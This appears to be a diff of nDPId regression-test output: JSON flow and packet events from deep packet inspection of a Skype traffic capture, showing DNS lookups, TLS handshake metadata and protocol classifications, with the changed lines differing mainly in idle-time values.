00811{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970634669,"flow_last_seen":1431970634723,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1431970634723,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57694,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"db3msgr5011709.gateway.messenger.live.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAABADqBAAEAGmPnAqAEinTg0HMgdnEkK2QRYAAAAALAC\/\/9q8wAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51229,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAABADqBAAEAGmPnAqAEinTg0HMgdnEkK2QRYAAAAALAC\/\/9q8wAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1431970634728,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634728,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/L\/oAAEARx0DAqAEiwKgBAfWbADUAK9VUuF8BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAABAAE="} 00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634728,"flow_last_seen":1431970634728,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634728,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":62875,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/lFMAAEARYufAqAEiwKgBAebpADUAK335A20BAAABAAAAAAAABWRzbjEzAWQFc2t5cGUDbmV0AAAcAAE="} 00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":59113,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"dsn13.d.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt4dAAEAGpVrAqAEinTh+08geAbsxSRU0AAAAALAC\/\/+DfQAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634729,"flow_last_seen":1431970634729,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970634729,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1431970634729,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970634729,"pkt":"0NQSxnP1PBXCt3IOCABFAABAt4dAAEAGpVrAqAEinTh+08geAbsxSRU0AAAAALAC\/\/+DfQAAAgQFtAEDAwUBAQgKPjGHIQAAAAAEAgAA"} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1431970634730,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634730,"pkt":"0NQSxnP1PBXCt3IOCABFAABLIWAAAEAR1c7AqAEiwKgBAeD4ADUANz9NJ5kBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAABAAE="} 00798{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634730,"flow_last_seen":1431970634730,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634730,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":57592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1431970634731,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431970634731,"pkt":"0NQSxnP1PBXCt3IOCABFAABL+hcAAEAR\/RbAqAEiwKgBAdB8ADUAN25j7f4BAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDExAXIFc2t5cGUDbmV0AAAcAAE="} 00799{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970634731,"flow_last_seen":1431970634731,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970634731,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"335.0.7.7.3.rst11.r.skype.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431970634805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970634805,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4BUNAAHYGIaedOH7TwKgBIgG7yB4Nim5XMUkVNZASIABVdAAAAgQFrAQCCAoZLZ4CPjGHIQ=="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1431970634805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634805,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/VlAAEAGX5TAqAEinTh+08geAbsxSRU1DYpuWIAQ\/\/+P3gAAAQEICj4xh20ZLZ4C"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1431970634933,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970634933,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJyB3uE3m5CtkEWaASOJCk1gAAAgQFrAQCCApMX+pXPjGHIQEDAwk="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1431970634934,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634934,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Qp9AAEAGZQbAqAEinTg0HMgdnEkK2QRZ7hN5uoAQECz7NQAAAQEICj4xh+xMX+pX"} -01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1431970634805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970634805,"pkt":"PBXCt3IO0NQSxnP1CABFAAA4BUNAAHYGIaedOH7TwKgBIgG7yB4Nim5XMUkVNZASIABVdAAAAgQFrAQCCAoZLZ4CPjGHIQ=="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1431970634805,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634805,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0\/VlAAEAGX5TAqAEinTh+08geAbsxSRU1DYpuWIAQ\/\/+P3gAAAQEICj4xh20ZLZ4C"} 
+00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431970634729,"flow_last_seen":1431970634832,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1431970634832,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1431970634933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970634933,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtJ2dODQcwKgBIpxJyB3uE3m5CtkEWaASOJCk1gAAAgQFrAQCCApMX+pXPjGHIQEDAwk="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1431970634934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970634934,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0Qp9AAEAGZQbAqAEinTg0HMgdnEkK2QRZ7hN5uoAQECz7NQAAAQEICj4xh+xMX+pX"} 
+01411{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431970634729,"flow_last_seen":1431970634990,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3792,"flow_avg_l4_payload_len":421,"midstream":0,"thread_ts_msec":1431970634990,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.126.211","src_port":51230,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.gateway.messenger.live.com,*.beta.gateway.edge.messenger.live.com,*.by2.gateway.edge.messenger.live.com,*.sn1.gateway.edge.messenger.live.com","ja3":"06207a1730b5deeb207b0556e102ded2","ja3s":"5e4e5596180ebd0ac0317125ee490707","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT SSL SHA2","subjectDN":"CN=*.gateway.messenger.live.com","fingerprint":"95:C4:07:41:85:D4:EF:AA:D9:1F:0F:1F:3C:08:BF:8E:8B:D0:90:51"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1431970635325,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970635325,"pkt":"0NQSxnP1PBXCt3IOCABFAAA657QAAEARD4vAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":38,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635325,"flow_last_seen":1431970635325,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970635325,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"ui.skype.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -61,37 +61,37 @@ 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635433,"flow_last_seen":1431970635433,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431970635433,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1431970635489,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431970635489,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA1+K0AQBV0hgaBgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAMABBfOIaY="} 00805{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":48,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431970635433,"flow_last_seen":1431970635489,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63661,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970635489,"flow_last_seen":1431970635489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970635489,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":51231,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 